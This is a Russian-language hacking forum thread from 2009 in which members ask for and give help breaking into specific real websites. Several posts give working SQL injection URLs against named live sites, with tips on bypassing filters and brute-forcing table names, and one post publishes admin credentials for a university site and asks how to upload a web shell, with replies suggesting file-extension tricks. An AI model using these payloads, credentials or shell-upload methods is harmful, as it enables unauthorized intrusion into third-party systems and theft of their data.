Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    а если при введении адреса http://la2.sz.ru/viewpage.php?u=xsnepx&page_id=99999 выводит "Невозможно получить содержание страницы" это может быть уязвимостью?
     
  2. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Нет ЭТО не уязвимость.
     
    1 person likes this.
  3. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Почему при заходе в http://video.antichat.ru с юзер агентом <script></script> и <?php?> (только с тегами script и пхп) выпадает 500 ошибко, как я понимаю 500 ошибку может быть вызывать и скрипт(не обязательно само по) который как то выпадает в зависимости от настроек, или это типа такая зашита?
     
    #5963 PaCo, 17 Mar 2009
    Last edited: 17 Mar 2009
  4. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    Access denied for user 'apache'@'localhost' (using password: NO) - эта ошибка значит что Логин пользователя бд = apache, а бд находится на том же компьютере что и сайт? тоесть остаётся только пасс подобрать? ?*??
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    нет, это значит, что в скрипте ошибка или просто слетели настройки, и функция mysql_connect() вызывается без параметров.
     
  6. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Способов миллиард. Поищи по ключ. фразам "MySQL Injection", "XSS", "PHP Include (локальный, удаленный)". Для начала. А потом я бы поучился metasploit'ом пользоваться. XSpider скачай, почитай про него... Все обсуждалось миллион раз. ;)
     
    #5966 AARON, 18 Mar 2009
    Last edited: 18 Mar 2009
  7. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Не качай XSpider !! Тем более если хочешь чему нибудь научиться.

    P.S.
    Для начала почитай:

    https://forum.antichat.ru/thread20140.html

    https://forum.antichat.ru/thread43966.html

    https://forum.antichat.ru/thread54355.html
    https://forum.antichat.ru/thread56756.html
    https://forum.antichat.ru/thread89082.html
     
    #5967 Qwazar, 18 Mar 2009
    Last edited: 18 Mar 2009
    2 people like this.
  8. lalala23

    lalala23 New Member

    Joined:
    14 Mar 2009
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    hi there

    http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*

    portbld-freebsd6.2
    nbt@localhost
    4.0.27
    nbt

    дальше не идет... не могу получить имена столбцов в таблице.
    у кого получится, киньте в личку, как сделали...
     
    #5968 lalala23, 18 Mar 2009
    Last edited: 18 Mar 2009
  9. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    Привет
    Вопрос по HTTP 1.1, а конкретно про метод PUT

    Почему могу с почью PUT создать txt и не могу создать asp? можно ли это обойти другими методами (copy, move, unlock .....)?

    второй вопрос. имеется файл web.config или xxx.asp. При COPY в txt - ошибка. Я так понемаю такая же причина что и в первом вопросе.

    Есть ли какие мнения?
     
  10. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    там я так смотрю очень права порезаны. остается подбор таблиц - 2 уже есть - выводятся при не правельном запросе. можно еще поиграться с INSERT, LOAD_FILE - но не думаю что из этого что либо получится - все из-за тех же прав.
     
  11. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    2 Imperrous

    Мне кажется что там вообще нет sql inj. ошибки работы скрипта.
     
  12. HIVER

    HIVER Member

    Joined:
    28 Oct 2008
    Messages:
    36
    Likes Received:
    18
    Reputations:
    0
    _http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
     
    2 people like this.
  13. -=Static=-

    -=Static=- Banned

    Joined:
    12 Nov 2006
    Messages:
    201
    Likes Received:
    40
    Reputations:
    0
    Тут к information_schema нет прав. Это значит, надо брутить имена талиц и столбцов. Я б SIPTом пробежал, по словарю.
     
  14. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.

    http://www.bookstreet.ru/prod_show.php?object_uid=2'

    Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
     
  15. sj666

    sj666 New Member

    Joined:
    15 Dec 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    помогите раскрутить :)
    http://www.danieldefo.ru/gallery.html?top=1'
    Она слепая?)
     
  16. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    http://siovizcenter.ucsd.edu/admin/
    rnewman:hot98DOG

    Как сюда шелл залить? Возможно?
     
  17. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
    если больше 2 - то ошибка
    а дальше вот что
    '=' - режет
    'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
    как видно SELECT в запросе убран

    тк = режется использовать можно <>

    http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
    а дальше читай тут

    http://injection.rulezz.ru/MSSQL-ASP-Injection.html
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    +++AndreyDevil+++, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
    sj666, какая ж она слепая?))
    версия бд - 4.0.27-log. а инф.схема появляеться только в пятой.
     
    _________________________
    #5978 yarbabin, 18 Mar 2009
    Last edited: 18 Mar 2009
  19. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    faza02,дело в том что он заливает .php но при переходе link становится такого вида http://siovizcenter.ucsd.edu/rq/_getImage.php?libid=223 и предлагает мне скачать шелл )
     
  20. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    значит ищи в attachements ... я щас просто на работе, был бы дома проверил бы сам все ...
     
Thread Status:
Not open for further replies.